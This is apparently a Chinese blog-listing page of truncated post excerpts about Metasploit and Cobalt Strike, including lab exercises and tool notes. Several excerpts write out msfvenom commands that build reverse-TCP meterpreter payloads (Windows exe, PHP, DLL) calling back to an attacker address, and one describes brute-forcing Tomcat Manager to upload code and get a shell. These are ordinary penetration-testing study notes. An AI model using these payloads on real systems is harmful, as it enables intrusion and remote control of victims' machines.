被控端生成:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.139 LPORT=2345 -f exe > /root/yangtest.exe msf配置如下当被控端运行后即可上线:msf5 > use exploit/mul ...
分类:
其他好文 时间:
2020-02-23 14:34:30
阅读次数:
295
https://www.cnblogs.com/test404/p/10599981.html + msf 派生 shell 给 Cobalt strike(前提有一个meterpreter) + Cobalt strike 派生 shell 给 MSF(前提有个beaconshell) 之后使用C ...
分类:
Web程序 时间:
2020-02-23 11:18:48
阅读次数:
90
两种方式 msf生成的payload分为正向和反向两种,正向需要正向连接,反向需要反向连接,反向是最常用的方式 正向连接指被攻击的目标机器通过正向的payload打开一个端口,攻击者的机器去连接目标机器的这个端口,从而建立连接 如果把攻击机器比喻成你,目标机器比喻成妹子,正向连接相当于你去追追妹子, ...
分类:
其他好文 时间:
2020-02-22 21:32:00
阅读次数:
376
Metasploit发布了版本5.0.76在该版本中,增加了以下模块:(1)增强了set payload命令的输入。用户在指定payload时,在payload名称前可以使用/payload、payload/和/前缀。(2)post/windows/manage/sshkey_persistence ...
分类:
Web程序 时间:
2020-02-22 15:30:06
阅读次数:
75
如图,在启动msf时,一般都会自动连接上数据库,今天偶然出现这种情况。解决办法大致如下: exit退出当前msf 可以先用msfdb start 检查一下是否启动:netstat -pandu | grep 5432 没有启动的话,用service postgresql start来连接 ...
分类:
数据库 时间:
2020-02-19 14:57:19
阅读次数:
110
一 建立反弹后门 msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下; 将生成的木马上传到目标机中,可以远程访问; windows下as ...
分类:
Web程序 时间:
2020-02-19 13:05:16
阅读次数:
266
某一次小练习 1.存活主机 根据提示我们可以查看 可以看到8080端口开放 浏览器访问 单纯图片 扫描目录 访问manager 2.利用msf爆破· 3.Tomcat Manager经过身份验证的上载代码执行 成功反弹到shell flag1 ...
分类:
其他好文 时间:
2020-02-16 22:18:44
阅读次数:
88
第一步:生成dll文件 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.106.10 LPORT=443 -f dll -o /tmp/reverse_tcp.dll 第二步:启动MSF等待回连 use exploit/mu ...
分类:
系统相关 时间:
2020-02-16 16:13:17
阅读次数:
132
准备工具 MSF https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers Donut https://github.com/TheWover/donut 准备的shellcode_inject.rb代码 ## # ...
分类:
系统相关 时间:
2020-02-08 09:22:54
阅读次数:
178
当我们把配置文件都修改好了之后,在/usr/share/beef-xss文件夹中输入./beef,出现如下错误信息 API Fire Error: execution expired in {:owner=>BeEF::Extension::Metasploit::API::MetasploitHo ...
分类:
系统相关 时间:
2020-02-06 15:02:06
阅读次数:
208